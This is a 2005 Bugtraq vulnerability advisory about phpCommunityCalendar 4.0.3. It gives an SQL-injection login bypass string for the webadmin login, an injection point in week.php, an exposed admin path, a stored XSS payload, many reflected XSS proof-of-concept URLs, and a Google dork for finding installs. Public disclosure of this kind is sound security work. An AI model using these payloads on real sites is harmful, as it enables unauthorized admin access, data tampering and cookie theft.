[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: phpCommunityCalendar 4.0.3 (possibly prior versions) sql
From: retrogod () aliceposta ! it
Date: 2005-09-05 15:53:04
Message-ID: 20050905155304.30886.qmail () securityfocus ! com
[Download RAW message or body]
phpCommunityCalendar 4.0.3 (possibly prior versions)
sql injection / login bypass / cross site scripting
software:
site: http://open.appideas.com
download: http://open.appideas.com/Calendar/
1) sql injection / login bypass:
"admin" directory contains tools for the site administrator. "webadmin" contains \
tools for category administrators. If magic quotes off a user can bypass category \
admin check modifying sql login query, example: go to \
http://[target]/[path]/webadmin/login.php and use this:
login: ' or isnull(1/0) /*
password: [nothing here]
now you can add, delete, modify events
2) sql injection:
http://[target]/[path]/week.php?LocationID=-1'[INJECTION]%20/*
3) "admin" directory should be password protected by .htaccess , if not you can
go to control panel as main admin
http://[target]/[path]/admin/
4) cross site scripting, poc:
4.1) add an event and fill some fields with this:
\'\);</script><script>alert(document.cookie)</script>
4.2) check this urls:
http://[target]/[path]/thankyou.php?LocationID="><script>alert('LOL')</script>
http://[target]/[path]/calDaily.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calMonthly.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calWeekly.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calYearly.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"
http://[target]/[path]/day.php?font="><script>alert('LOL')</script><!--
http://[target]/[path]/day.php?LocationID="><script>alert('LOL')</script><!--
http://[target]/[path]/event.php?font="><script>alert('LOL')</script>
http://[target]/[path]/event.php?CeTi=</title><script>alert('LOL')</script>
http://[target]/[path]/event.php?Contact=<script>alert('LOL')</script>
http://[target]/[path]/event.php?Description=<script>alert('LOL')</script>
http://[target]/[path]/event.php?ShowAddress=<script>alert('LOL')</script>
http://[target]/[path]/week.php?font="><script>alert('LOL')</script>
and so on... (a lot of uninitizialized vars showned)
googledork: "Calendar programming by AppIdeas.com" filetype:php
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://www.rgod.altervista.org/phpccal.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic